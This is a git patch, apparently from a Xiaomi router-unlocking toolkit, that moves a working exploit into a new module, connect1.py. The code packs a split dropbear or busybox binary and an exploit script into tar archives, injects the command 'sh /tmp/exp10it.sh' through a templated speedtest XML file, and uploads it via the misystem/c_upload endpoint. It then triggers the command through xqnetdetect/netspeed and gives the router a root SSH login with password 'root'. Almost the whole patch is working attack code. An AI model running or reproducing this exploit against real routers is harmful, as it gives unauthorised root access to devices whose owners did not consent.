From 75e89e8f04f37911fb552bf9039cb0fcb21d7f49 Mon Sep 17 00:00:00 2001 From: remittor Date: Tue, 25 Feb 2025 15:35:59 +0300 Subject: [PATCH] connect: Transfer exploit c_upload/netspeed to isolated module --- connect.py | 160 ++++------------------------------------------------ connect1.py | 133 +++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 144 insertions(+), 149 deletions(-) create mode 100644 connect1.py diff --git a/connect.py b/connect.py index 9d62af0..62550ba 100644 --- a/connect.py +++ b/connect.py @@ -3,34 +3,31 @@ import os import sys -import re import time -import random -import hashlib -import requests -import socket -import tarfile import xmir_base -import gateway from gateway import * -gw = gateway.Gateway(detect_device = False, detect_ssh = False) +gw = Gateway(detect_device = False, detect_ssh = False) if len(sys.argv) > 1: - ip_addr = sys.argv[1] - if not ip_addr: - die("You entered an empty IP-address!") - gw.ip_addr = ip_addr + ip_addr = sys.argv[1] + if not ip_addr: + die("You entered an empty IP-address!") + gw.ip_addr = ip_addr gw.set_timeout(4) gw.detect_device() if gw.status < 1: - die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr)) + die(f"Xiaomi Mi Wi-Fi device not found (IP: {gw.ip_addr})") dn = gw.device_name +if gw.model_id > 0 and gw.model_id < gw.get_modelid_by_name('R2100'): + import connect1 # c_upload/netspeed + sys.exit(0) + #if dn in 'R2100 R2350 RM1800 RM2100 RA67': # import connect2 # sys.exit(0) @@ -51,7 +48,7 @@ dn = gw.device_name # import connect4 # sys.exit(0) -if gw.model_id <= 0 or gw.model_id >= gw.get_modelid_by_name('R2100'): +if True: # init gw and check ssh gw = create_gateway(timeout = 4, die_if_sshOk = True, die_if_ftpOk = True, web_login = True) @@ -68,138 +65,3 @@ if gw.model_id <= 0 or gw.model_id >= gw.get_modelid_by_name('R2100'): continue # try next module except Exception: raise - - sys.exit(0) - -# =============================================================================== - -print("device_name =", gw.device_name) -print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel)) -print("mac = {}".format(gw.mac_address)) - -gw.ssh_port = 122 -ret = gw.detect_ssh(verbose = 1, interactive = True) -if ret > 0: - if gw.use_ssh: - die(0, "SSH-server already installed and running") - else: - #die(0, "Telnet-server already running") - pass - -use_ssh = True - -stok = gw.web_login() - -dn_tmp = 'tmp/' -if use_ssh: - dn_dir = 'data/payload_ssh/' -else: - dn_dir = 'data/payload/' - -print("Begin creating a payload for the exploit...") -fn_payload1 = 'tmp/payload1.tar.gz' -fn_payload2 = 'tmp/payload2.tar.gz' -fn_payload3 = 'tmp/payload3.tar.gz' -if use_ssh: - fn_pfname = 'dropbearmulti' -else: - fn_pfname = 'busybox' - -fn_pf1 = dn_tmp + fn_pfname + '_01' -fn_pf2 = dn_tmp + fn_pfname + '_02' -fn_pf3 = dn_tmp + fn_pfname + '_03' - -fn_suffix = '_mips' -if dn == 'R3D' or dn == 'D01': - fn_suffix = '_armv7a' -if dn == "RB03": - fn_suffix = '_arm64' - -fn_pf = dn_dir + fn_pfname + fn_suffix - -if os.path.exists(fn_payload1): - os.remove(fn_payload1) -if os.path.exists(fn_payload2): - os.remove(fn_payload2) -if os.path.exists(fn_payload3): - os.remove(fn_payload3) - -with open(fn_pf, "rb") as file: - pf = file.read() -psize = len(pf) // 3 -wsize = psize + 8000 -with open(fn_pf1, "wb") as file: - file.write(pf[:wsize]) -pf = pf[wsize:] -wsize = psize - 8000 -with open(fn_pf2, "wb") as file: - file.write(pf[:wsize]) -pf = pf[wsize:] -with open(fn_pf3, "wb") as file: - file.write(pf) - -fn_exploit = "exp10it.sh" -command = "sh /tmp/" + fn_exploit - -fn_executor = "speedtest_urls.xml" -with open(dn_dir + fn_executor, "rt", encoding = "UTF-8") as file: - template = file.read() -data = template.format(router_ip_address=gw.ip_addr, command=command) -with open(dn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file: - file.write(data) - -with tarfile.open(fn_payload1, "w:gz", compresslevel=9) as tar: - tar.add(fn_pf1, arcname = os.path.basename(fn_pf1)) - -with tarfile.open(fn_payload2, "w:gz", compresslevel=9) as tar: - tar.add(fn_pf2, arcname = os.path.basename(fn_pf2)) - -with tarfile.open(fn_payload3, "w:gz", compresslevel=9) as tar: - tar.add(fn_pf3, arcname = os.path.basename(fn_pf3)) - tar.add(dn_tmp + fn_executor, arcname = fn_executor) - tar.add(dn_dir + fn_exploit, arcname = fn_exploit) - if use_ssh: - tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg') - tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh') - -if os.path.exists(fn_pf1): - os.remove(fn_pf1) -if os.path.exists(fn_pf2): - os.remove(fn_pf2) -if os.path.exists(fn_pf3): - os.remove(fn_pf3) - -tgz_size1 = os.path.getsize(fn_payload1) -if tgz_size1 > 100*1024 - 128: - die("File size {} exceeds 100KiB".format(fn_payload1)) - -tgz_size2 = os.path.getsize(fn_payload2) -if tgz_size2 > 100*1024 - 128: - die("File size {} exceeds 100KiB".format(fn_payload2)) - -print("Start uploading the exploit with payload...") - -if (fn_payload1): - requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')}) -if (fn_payload2): - requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')}) -if (fn_payload3): - requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')}) - -time.sleep(1) - -if use_ssh: - print("Running SSH server on port {}...".format(gw.ssh_port)) - gw.use_ssh = True -else: - print("Running TELNET and FTP servers...") - gw.use_ftp = True - -requests.get(gw.apiurl + "xqnetdetect/netspeed") - -time.sleep(0.5) -gw.passw = 'root' -gw.ping(contimeout = 27) - -print("") -print("#### Connection to device {} is OK ####".format(gw.device_name)) diff --git a/connect1.py b/connect1.py new file mode 100644 index 0000000..4c3c2c1 --- /dev/null +++ b/connect1.py @@ -0,0 +1,133 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import sys +import re +import time +import random +import hashlib +import requests +import socket +import tarfile + +import xmir_base +from gateway import * + + +gw = create_gateway(ssh_port = 122, die_if_sshOk = True, die_if_ftpOk = False) + +dn = gw.device_name + +use_ssh = True + +dn_tmp = 'tmp/' + +if use_ssh: + dn_dir = 'data/payload_ssh/' +else: + dn_dir = 'data/payload/' + +print("Begin creating a payload for the exploit...") +fn_payload1 = 'tmp/payload1.tar.gz' +fn_payload2 = 'tmp/payload2.tar.gz' +fn_payload3 = 'tmp/payload3.tar.gz' + +if use_ssh: + fn_pfname = 'dropbearmulti' +else: + fn_pfname = 'busybox' + +fn_pf1 = dn_tmp + fn_pfname + '_01' +fn_pf2 = dn_tmp + fn_pfname + '_02' +fn_pf3 = dn_tmp + fn_pfname + '_03' + +fn_suffix = '_mips' +if dn == 'R3D' or dn == 'D01': + fn_suffix = '_armv7a' +if dn == "RB03": + fn_suffix = '_arm64' + +fn_pf = dn_dir + fn_pfname + fn_suffix + +os.remove(fn_payload1) if os.path.exists(fn_payload1) else None +os.remove(fn_payload2) if os.path.exists(fn_payload2) else None +os.remove(fn_payload3) if os.path.exists(fn_payload3) else None + +with open(fn_pf, "rb") as file: + pf = file.read() +psize = len(pf) // 3 +wsize = psize + 8000 +with open(fn_pf1, "wb") as file: + file.write(pf[:wsize]) +pf = pf[wsize:] +wsize = psize - 8000 +with open(fn_pf2, "wb") as file: + file.write(pf[:wsize]) +pf = pf[wsize:] +with open(fn_pf3, "wb") as file: + file.write(pf) + +fn_exploit = "exp10it.sh" +command = f"sh /tmp/{fn_exploit}" + +fn_executor = "speedtest_urls.xml" +with open(dn_dir + fn_executor, "rt", encoding = "UTF-8") as file: + template = file.read() + +data = template.format(router_ip_address=gw.ip_addr, command=command) +with open(dn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file: + file.write(data) + +with tarfile.open(fn_payload1, "w:gz", compresslevel=9) as tar: + tar.add(fn_pf1, arcname = os.path.basename(fn_pf1)) + +with tarfile.open(fn_payload2, "w:gz", compresslevel=9) as tar: + tar.add(fn_pf2, arcname = os.path.basename(fn_pf2)) + +with tarfile.open(fn_payload3, "w:gz", compresslevel=9) as tar: + tar.add(fn_pf3, arcname = os.path.basename(fn_pf3)) + tar.add(dn_tmp + fn_executor, arcname = fn_executor) + tar.add(dn_dir + fn_exploit, arcname = fn_exploit) + if use_ssh: + tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg') + tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh') + +os.remove(fn_pf1) if os.path.exists(fn_pf1) else None +os.remove(fn_pf2) if os.path.exists(fn_pf2) else None +os.remove(fn_pf3) if os.path.exists(fn_pf3) else None + +tgz_size1 = os.path.getsize(fn_payload1) +if tgz_size1 > 100*1024 - 128: + die(f'File size "{fn_payload1}" exceeds 100KiB') + +tgz_size2 = os.path.getsize(fn_payload2) +if tgz_size2 > 100*1024 - 128: + die(f'File size {fn_payload2} exceeds 100KiB') + +print("Start uploading the exploit with payload...") + +if (fn_payload1): + requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload1, 'rb')}) +if (fn_payload2): + requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload2, 'rb')}) +if (fn_payload3): + requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload3, 'rb')}) + +time.sleep(1) + +if use_ssh: + print(f"Running SSH server on port {gw.ssh_port}...") + gw.use_ssh = True +else: + print("Running TELNET and FTP servers...") + gw.use_ftp = True + +requests.get(gw.apiurl + "xqnetdetect/netspeed") + +time.sleep(0.5) +gw.passw = 'root' +gw.ping(contimeout = 27) + +print("") +print(f"#### Connection to device {gw.device_name} is OK ####")